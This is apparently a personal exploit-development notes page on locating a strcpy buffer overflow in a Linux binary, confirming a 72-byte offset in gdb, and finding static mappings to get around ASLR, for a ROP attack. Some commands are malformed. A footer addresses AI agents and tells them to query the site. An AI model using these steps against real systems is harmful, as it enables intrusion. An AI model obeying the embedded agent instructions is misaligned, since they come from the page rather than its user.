# ROP Finding the vulnerable function * At this point you have been able to generate a crash on a linux binary. We now need to find the vulnerable function before progressing ``` # creating the crash python3 -c 'print("A"*100) > temp.txt ./binary file.txt Segmentation fault ``` * use `ltrace` to see if there is a function that is causing the crash ``` ltrace ./binary file.txt 2>&1 | grep SIGSEGV -B1 7120-strcpy(0x6fff3b10, "AAAAAAAAAAAAAAAAAA"...) = 0x2ffff108b --snip-- ``` * we can see that `strcpy` is the issue here causing the crash * use `objdump` to see where in the code segment `strcpy()` is called. * Look at the GOT of the program and grep for `strcpy()` * Then use the `objdump` tool to specifically query the `.plt` segment to see where the address in the GOT is referenced. * After attaining the address use `objdump` tool once more and change the segment to `.text` and grep on the address shown in the PLT ``` objdump -R ./binary | grep strcpy 0304b00a R_386_JUMP_SLOT strcpy objdump -j .plt -d binary | grep b00a 70482b7: ff 25 0a b0 04 03 jmp *0x0304b00a objdump -j .text -d binary | 82b7 -B2 -A2 # you will see the vuln buffer size # the address of strcpy@plt # and a ret which is a good spot for a break to see # if your payload was successfully copied into mem ``` * to validate your finding see if your buffer analysis was correct (72) ``` python3 -c print("A"*72 + "BBBB") > temp.txt gdb ./binary run temp.txt Program recieved signal SIGSEGV, Segmentation fault 0x42424242 in ?? () ``` ### Find static addresses * We need to find static memory locations as ASLR will be enabled on modern systems. * There may be static regions that do not utilize ASLR * There could be static mappings due to any third party programs that get mapped into our program * use `ltrace` to find the static mappings ``` ltrace ./binary file.txt 2>&1 | egrep -i 'mmap|open' ``` * look for any shared object that is mmap into the binary * should see an open() call followed by a mmap() with a memory address passed into mmap() --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://book.ice-wzl.xyz/exploit-development/rop-finding-the-vulnerable-function.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.